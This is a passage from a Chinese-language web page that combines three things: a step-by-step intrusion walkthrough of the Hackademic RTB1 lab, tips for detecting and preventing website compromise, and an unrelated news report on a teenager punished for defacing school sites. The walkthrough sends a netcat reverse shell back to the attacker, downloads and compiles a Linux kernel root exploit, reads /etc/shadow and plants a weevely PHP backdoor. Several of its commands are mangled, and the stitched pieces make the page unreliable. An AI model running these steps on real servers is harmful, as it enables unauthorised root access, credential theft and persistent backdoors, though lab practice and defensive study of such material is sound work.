Phpwebshell被解析了,我們可以控制網(wǎng)站的文件,但是我們只希望獲得網(wǎng)站服務(wù)器的root權(quán)限,來(lái)入侵服務(wù)器上其它的網(wǎng)站。
第六步:用NC來(lái)反彈一個(gè)shell
首先在我們的電腦上監(jiān)聽(tīng)5555端口。
然后在Php webshell上反向連接我們的電腦,輸入IP和端口5555.
點(diǎn)擊連接我們會(huì)看到
接下來(lái)我們嘗試執(zhí)行一些命令:
id
uid=48(apache) gid=489(apache) groups=489(apache)
(用來(lái)顯示用戶的id和組)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins
(顯示服務(wù)器上當(dāng)前的路徑)
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 721:41:45 EST 2009 i686 i686 i386 GNU/Linux
(顯示內(nèi)核版本信息)
現(xiàn)在我們知道,服務(wù)器的內(nèi)核版本是2.6.31.5-127.fc12.1686,我們?cè)趀xploit-db.com中搜索此版本的相關(guān)漏洞.
第七步:在服務(wù)器上測(cè)試了很多exp之后,用以下的exp來(lái)提升權(quán)限.
http://www.exploit-db.com/exploits/15285
在nc shell上執(zhí)行以下命令:
wgethttp://www.exploit-db.com/exploits/15285 -o roro.c
(下載exp到服務(wù)器并重命名為roro.c)
注:很多l(xiāng)inux內(nèi)核的exp都是C語(yǔ)言開(kāi)發(fā)的,因此我們保存為.c擴(kuò)展名.
exp roro.c代碼如下:
#include
#define RECVPORT 5555
#define SENDPORT 6666
int prep_sock(int port)
{
int s, ret;
struct sockaddr_in addr;
s=socket(PF_RDS, SOCK_SEQPACKET, 0);
if(s < 0)
{
printf("[*] Could not open socket.");
exit(-1);
}
memset(&addr, 0, sizeof(addr));
通過(guò)以上代碼我們發(fā)現(xiàn)該exp是C語(yǔ)言開(kāi)發(fā)的,我們需要將他編譯成elf格式的,命令如下:
gcc roro.c –ororo
接下來(lái)執(zhí)行編譯好的exp
./roro
執(zhí)行完成之后我們輸入id命令
id
發(fā)現(xiàn)我們已經(jīng)是root權(quán)限了
uid=0(root) gid=0(root)
現(xiàn)在我們可以查看/etc/shadow文件
cat/etc/shadow
第八步:用weevely制作一個(gè)php小馬上傳到服務(wù)器上,留個(gè)后門
1、weevely使用選項(xiàng)
root@bt:/pentest/backdoors/web/weevely#./main.py
2.用weevely創(chuàng)建一個(gè)密碼為koko的php后門
root@bt:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko
接下來(lái)上傳到服務(wù)器之后來(lái)使用它
root@bt:/pentest/backdoors/web/weevely#./main.py -t -uhttp://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -pkoko
測(cè)試我們的hax.php后門
以上就是入侵網(wǎng)站的全過(guò)程實(shí)例描述!
1、如何判斷網(wǎng)站被黑?
如果存在下列問(wèn)題,則您的網(wǎng)站可能已經(jīng)被黑客攻擊:
1) 通過(guò)site命令查詢站點(diǎn),顯示搜索引擎收錄了大量非本站應(yīng)有的頁(yè)面。
2) 從百度搜索結(jié)果中點(diǎn)擊站點(diǎn)的頁(yè)面,跳轉(zhuǎn)到了其他站點(diǎn)。
3) 站點(diǎn)內(nèi)容在搜索結(jié)果中被提示存在風(fēng)險(xiǎn)。
4) 從搜索引擎帶來(lái)的流量短時(shí)間內(nèi)異常暴增。
一旦發(fā)現(xiàn)上述異常,建議您立即對(duì)網(wǎng)站進(jìn)行排查。包括:
1、分析系統(tǒng)和服務(wù)器日志,檢查自己站點(diǎn)的頁(yè)面數(shù)量、用戶訪問(wèn)流量等是否有異常波動(dòng),是否存在異常訪問(wèn)或操作日志;
2、檢查網(wǎng)站文件是否有不正常的修改,尤其是首頁(yè)等重點(diǎn)頁(yè)面;
3、網(wǎng)站頁(yè)面是否引用了未知站點(diǎn)的資源(圖片、JS等),是否被放置了異常鏈接;
4、檢查網(wǎng)站是否有不正常增加的文件或目錄;
5、檢查網(wǎng)站目錄中是否有非管理員打包的網(wǎng)站源碼、未知txt文件等。
2、如何應(yīng)對(duì)網(wǎng)站被黑?
如果排查確認(rèn)您的網(wǎng)站存在異常,此時(shí)您需要立即做出處理,包括:
1) 立即停止網(wǎng)站服務(wù),避免用戶繼續(xù)受影響,防止繼續(xù)影響其他站點(diǎn)(建議使用503返回碼)。
2) 如果同一主機(jī)提供商同期內(nèi)有多個(gè)站點(diǎn)被黑,您可以聯(lián)系主機(jī)提供商,敦促對(duì)方做出應(yīng)對(duì)。
3) 清理已發(fā)現(xiàn)的異常,排查出可能的被黑時(shí)間,和服務(wù)器上的文件修改時(shí)間相比對(duì),處理掉黑客上傳、修改過(guò)的文件;檢查服務(wù)器中的用戶管理設(shè)置,確認(rèn)是否存在異常的變化;更改服務(wù)器的用戶訪問(wèn)密碼。
注:可以從訪問(wèn)日志中,確定可能的被黑時(shí)間。不過(guò)黑客可能也修改服務(wù)器的訪問(wèn)日志。
4) 做好安全工作,排查網(wǎng)站存在的漏洞,防止再次被黑。
3、如何防止網(wǎng)站被黑?
1) 為避免您的網(wǎng)站被黑客攻擊,您需要在平時(shí)做大量的工作,例如
2) 定期檢查服務(wù)器日志,檢查是否有可疑的針對(duì)非前臺(tái)頁(yè)面的訪問(wèn)。
3) 經(jīng)常檢查網(wǎng)站文件是否有不正常的修改或者增加。
4) 關(guān)注操作系統(tǒng),以及所使用程序的官方網(wǎng)站。如果有安全更新補(bǔ)丁出現(xiàn),應(yīng)立即部署,不使用官方已不再積極維護(hù)的版本,如果條件允許,建議直接更新至最新版;關(guān)注建站程序方發(fā)布的的安全設(shè)置準(zhǔn)則。
5) 系統(tǒng)漏洞可能出自第三方應(yīng)用程序,如果網(wǎng)站使用了這些應(yīng)用程序,建議仔細(xì)評(píng)估其安全性。
6) 修改開(kāi)源程序關(guān)鍵文件的默認(rèn)文件名,黑客通常通過(guò)自動(dòng)掃描某些特定文件是否存在的方式來(lái)判斷是否使用了某套程序。
7) 修改默認(rèn)管理員用戶名,提高管理后臺(tái)的密碼強(qiáng)度,使用字母、數(shù)字以及特殊符號(hào)多種組合的密碼,并嚴(yán)格控制不同級(jí)別用戶的訪問(wèn)權(quán)限。
8) 選擇有實(shí)力保障的主機(jī)服務(wù)提供商。
9) 關(guān)閉不必要的服務(wù),以及端口。
10) 關(guān)閉或者限制不必要的上傳功能。
11) 設(shè)置防火墻等安全措施。
12) 若被黑問(wèn)題反復(fù)出現(xiàn),建議重新安裝服務(wù)器操作系統(tǒng),并重新上傳備份的網(wǎng)站文件。
年攻擊十余網(wǎng)站獲利萬(wàn)余元
衡陽(yáng)全搜索網(wǎng)訊(記者 姚永軍 通訊員 趙四榮 程建銘)近日,衡南縣公安局網(wǎng)安大隊(duì)在市公安局網(wǎng)技支隊(duì)的大力支持下,成功破獲一起黑客非法侵入網(wǎng)站案,犯罪嫌疑人閆某飛因未滿16歲,警方依法對(duì)其處以治安處罰,并責(zé)令其監(jiān)護(hù)人加強(qiáng)教育。
今年8月21日,衡南縣公安局接到上級(jí)交辦案件線索:衡南縣某小學(xué)網(wǎng)站被黑客攻擊并上傳黑頁(yè)、黑鏈。網(wǎng)安大隊(duì)立即開(kāi)展調(diào)查取證。民警調(diào)查發(fā)現(xiàn),衡南縣某小學(xué)網(wǎng)站的系統(tǒng)文件里被人從后臺(tái)植入了一個(gè)文件,點(diǎn)擊該文件,就會(huì)在網(wǎng)站打開(kāi)一個(gè)黑頁(yè)面,造成該計(jì)算機(jī)信息系統(tǒng)不能正常運(yùn)行,嚴(yán)重影響該校的網(wǎng)絡(luò)安全及正常教學(xué)秩序。
由于該案系衡南縣首起非法入侵計(jì)算機(jī)系統(tǒng)違法犯罪,該局領(lǐng)導(dǎo)高度重視,組織精干警力迅速投入偵查。11月,通過(guò)大量偵查工作鎖定河南籍的閆某飛(男,15歲)有重大作案嫌疑。12月7日,辦案民警趕赴河南某縣開(kāi)展工作,在當(dāng)?shù)毓矙C(jī)關(guān)協(xié)助下成功掌握嫌疑人閆某飛的租住地址。12月8日晚,閆某飛在其父親陪同下到公安機(jī)關(guān)投案自首。
經(jīng)訊問(wèn),閆某飛自2017年6月份開(kāi)始在網(wǎng)上QQ群學(xué)習(xí)黑客技術(shù),并在一個(gè)網(wǎng)站里尋找曾被其他人進(jìn)行過(guò)黑客攻擊的網(wǎng)站網(wǎng)址,然后將自己制作好的后綴名為“.html”的黑頁(yè)上傳植入這些網(wǎng)站進(jìn)行二次攻擊。通過(guò)該方式閆某飛共向包括衡南縣某小學(xué)網(wǎng)站在內(nèi)的全國(guó)十余個(gè)網(wǎng)站后臺(tái)植入黑頁(yè)、黑鏈,非法獲利10000余元。
由于閆某飛未滿16周歲,衡南警方依法對(duì)閆某飛作出行政拘留5日的處罰,并追繳其違法所得。
*請(qǐng)認(rèn)真填寫需求信息,我們會(huì)在24小時(shí)內(nèi)與您取得聯(lián)系。